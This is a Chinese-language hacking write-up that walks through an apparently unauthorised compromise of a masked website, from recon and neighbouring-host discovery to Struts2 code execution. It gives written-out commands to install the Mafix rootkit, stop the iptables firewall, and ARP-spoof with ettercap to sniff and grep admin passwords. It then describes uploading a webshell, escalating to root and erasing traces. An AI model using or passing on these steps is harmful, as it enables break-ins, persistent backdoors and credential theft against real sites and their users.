目标:www.xxx.com 

0x01 主站踩点

    

主站dedecms 目前公布的0day没有一个能用的,并且后台不是默认的,google hack无果。

 

0x02 旁站分析

        旁站有二十多个,大部分是现场的cms的二次开发,没有漏洞,还有一个bbs dz,同样也没有漏洞

 

0x03 CLinux主机突破

      查询C浏览网站发现一个 ssss.com/login.action ,熟悉吧 struct2代码执行不解释   

 

0x04 Linux主机Rookit

    

     这里我用的Rookitmafix

 

   执行命令:

            tar zxvf mafix.tar.gz

     chmod +x root

   ./root password 23141

 

   Putty登录

      注意如果防火墙开着的话,不愿意在防火墙里添加规则的话可以关掉防火墙

 

  停止防火墙

   /etc/init.d/iptables stop

 

  版本

0x05  Linux主机安装ettercap 嗅探密码

 

    1下载与安装EPELRPM包。

         rpm -ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm

           2 yum -y install ettercap

 

 

    开始嗅探

 

    开启转发(可能不需要)

      echo 1 > /proc/sys/net/ipv4/ip_forward

 

    嗅探

 

     ettercap –T –M arp /目标ip/80 /网关/ -w /tmp/log.txt

 

   嗅探时间可能会挺长可以后台运行

     nohup ettercap –T –M arp /目标ip/80 /网关/-w /tmp/log.txt

 

0x06 数据筛选

 

   由于这个网站的数据特别大,一小时的数据有1g多,好吧,grep筛选出

 

   抓包分析出目标站前台提交的密码的字段 pwd

 

    cat /tmp/log.txt | grep –a “&pwd=” | more

 

   好吧,每隔几小时我就看一次,过了半天,嗅到后台密码了,同时也嗅到后台地址了

 

   www.xxx.com/xxx/login.php]http://www.xxx.com/xxx/login.php]www.xxx.com/xxx/login.php

0x07 上传一句话 root提权

    

     上传一句话,翻文件,找到了Root,结合我的udf api 添加用户提权成功。

 

0x08 擦屁股。